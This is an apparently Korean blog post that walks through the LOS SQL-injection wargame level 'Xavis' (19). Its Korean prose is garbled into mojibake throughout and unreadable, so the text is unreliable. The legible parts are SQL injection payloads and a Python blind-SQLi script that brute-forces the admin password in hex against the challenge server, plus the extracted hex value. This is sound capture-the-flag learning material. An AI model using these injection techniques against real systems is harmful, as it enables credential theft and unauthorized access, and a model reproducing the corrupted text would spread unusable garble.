ํ‹ฐ์Šคํ† ๋ฆฌ ๋ทฐ

CHALLENGE

[LOS] Xavis ํ’€์ด(19)

๐ŸŒง: 2020. 12. 10.

์—„์ฒญ ๊นŒ๋‹ค๋กœ์› ๋˜ "xavis๋ฌธ์ œ์ž…๋‹ˆ๋‹ค.

์ฒ˜์Œ ๋ดค์„ ๋•Œ๋Š” ๋ ˆ๋ฒจ ๋‚œ์ด๋„ ์น˜๊ณ ๋Š” ๋„ˆ๋ฌด ์‰ฌ์šด ๋ฌธ์ œ์ธ ๊ฑฐ ๊ฐ™์•„์„œ ์‰ฌ์–ด๊ฐ€๋Š” ํƒ€์ž„์ธ ์ค„ ์•Œ์•˜์œผ๋‚˜ ์ •๋‹ต์ด ์ „ํ˜€ ๋‚˜์˜ค์ง€๊ฐ€ ์•Š์•˜์Šต๋‹ˆ๋‹ค.

 

์ฟผ๋ฆฌ๋ฌธ์„ "์ฐธ"์œผ๋กœ ๋งŒ๋“ค์–ด์„œ ํŒจ์Šค์›Œ๋“œ ๊ธธ์ด๋ฅผ ์œ ์ถ”ํ•˜์—ฌ 12์ž๋ฆฌ์ธ๊ฒƒ์„ ์•Œ์•„๋‚ด๊ณ  ํ•œ ๋˜๋ฐ๋กœ burp suite๋ฅผ ํ†ตํ•ด ๊ฐ’์„ ํ•˜๋‚˜์”ฉ ๋Œ€์ž…ํ•ด์„œ ๊ฒฐ๊ณผ๋ฅผ ์–ป์–ด๋‚ด๋ ค๊ณ  ascii ์ฝ”๋“œ๋ฅผ ๋Œ๋ ค๋ดค์ง€๋งŒ ๋„์ถœ๋œ ๊ฐ’์€ ์ „ํ˜€ ์—†๊ณ  ๊ณผ๋ถ€ํ•˜๊ฐ€ ๊ฑธ๋ ค ๋„์ค‘์— ๋ฉˆ์ถ”๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

 

๋ฌธ์ œ ์ ‘๊ทผ ๋ฐฉ์‹๋ถ€ํ„ฐ ์ถœ์ œ์ž์˜ ์˜๋„๋ฅผ ๋ชจ๋ฅด๊ฒ ์–ด์„œ ํžŒํŠธ๋ฅด ๋ณด๋ฉด์„œ ์‹œ์ž‘ํ–ˆ์Šต๋‹ˆ๋‹ค.

ํžŒํŠธ

1. ํŒจ์Šค์›Œ๋“œ๊ฐ€ ์ˆซ์ž, ์•ŒํŒŒ๋ฒณ, ํŠน์ˆ˜๋ฌธ์ž ๊ฐ€ ์•„๋‹˜
2. ascii
์ฝ”๋“œ๋กœ ์ถœ๋ ฅ์‹œํ‚ค์ง€๋ง๊ณ  "hex" ํ˜•ํƒœ๋กœ ์ถœ๋ ฅ์‹œํ‚ฌ๊ฒƒ

3. ์ถœ๋ ฅ๋œ "hex" ๊ฐ’์„ ์›๋ฌธ ํ˜•ํƒœ๋กœ decode ํ• ๊ฒƒ

 

Input Code

' or length(hex(pw))='24
' or length(substr(pw,1,1)))='4

 

pw์˜ ๊ฐ’์„ ํ—ฅ์‚ฌ๋กœ ๋Œ๋ ค์„œ ๊ธธ์ด๋ฅผ ํ™•์ธํ•ด๋ณธ๊ฒฐ๊ณผ "24" ์ž๋ฆฌ๊ฐ€ ๋‚˜์™”์œผ๋ฉฐ, ์ฒซ๊ธ€์ž์˜ ํŒจ์Šค์›Œ๋“œ ๊ธธ์ด๊ฐ€ ๋ฌด๋ ค "4" ์ž๋ฆฌ์ž…๋‹ˆ๋‹ค.

์ •๋‹ต์€ 3๊ธ€์ž์ธ๋ฐ ํ•œ์ž๋ฆฌ ํŒจ์Šค์›Œ๋“œ๋‹น 4๊ฐœ์˜ ๋ฌธ์ž์—ด์ด ๋˜์–ด์žˆ์Šต๋‹ˆ๋‹ค. ์ด๊ฒƒ์€ "hex"๊ฐ€ 8๋น„ํŠธ ๋ฅผ ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์ด๋ผ๊ณ  ๋ณด์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค.

 

์ด๋ฒˆ์—๋Š” ํ™•์ธํ•ด์•ผ ๋  ๊ฐ’์˜ ํญ์ด ํฌ๊ธฐ ๋•Œ๋ฌธ์— burp suite ๊ฐ€ ์•„๋‹Œ python์„ ์‚ฌ์šฉํ•ด์„œ ์ถœ๋ ฅํ•ด์•ผ ๋ฉ๋‹ˆ๋‹ค.

 

# -*- coding: utf-8 -*-
import requests
from prettytable import PrettyTable

x = PrettyTable()

x.field_names = ["password"]

cookies = {"PHPSESSID": "ah35rn49pvpac6k519qikbnpcn"}
ascii = "0123456789abcdefghijklmnopqrstuvwxyz"
pw = ""

for j in range(1, 25):
    for i in ascii:
        url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?" \
              "pw=' or id='admin' and substr(hex(pw),{0},1)='{1}'%23".format(j, i)
        response = requests.get(url, cookies=cookies)

        res = str(response.content)

        if res.find("Hello admin") != -1:
            pw=pw+i
            #print(pw)
            print(x)
            x.add_row([pw])
            break

 

์ƒ์œ„์˜ ์ฝ”๋“œ๋ฅผ ํ†ตํ•ด ๋„์ถœ๋œ 16์ง„์ˆ˜ ํ˜•ํƒœ์ธ admin์˜ hex(ํŒจ์Šค์›Œ๋“œ)์ž…๋‹ˆ๋‹คํŒจ์Šค์›Œ๋“œ์˜ ํ•œ ์ž๋ฆฌ๋‹น 4 ์ž๋ฆฟ์ˆ˜๊ฐ€ ์‚ฌ์šฉ๋œ ๊ฒƒ์„ ๊ฐ์•ˆํ•˜์—ฌ ์ชผ๊ฐœ ๋ณด๋ฉด 0000c6b00000c6550000ad73  -->  c6b0 c655 ad73 ์ด๋Ÿฐ ํ˜•ํƒœ๋กœ ๋ฉ๋‹ˆ๋‹ค.

 

์ด์ œ hex ์ฝ”๋“œ๋ฅผ ํ•œ๊ธ€ ํ˜•ํƒœ๋กœ ์›๋ณต ํ•˜๊ธฐ๋งŒ ํ•˜๋ฉด ๋˜๊ฒ ๋„ค์š”

 

'CHALLENGE' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[LOS] Dragon ํ’€์ด(20)  (0) 2020.12.11
XSS Challenges 8  (0) 2020.12.11
[LOS] Nightmare ํ’€์ด(18)  (0) 2020.12.10
XSS Challenges 7  (0) 2020.12.10
[LOS] Zombie assassin ํ’€์ด(17)  (0) 2020.12.09
๊ณต์œ ํ•˜๊ธฐ ๋งํฌ
Comment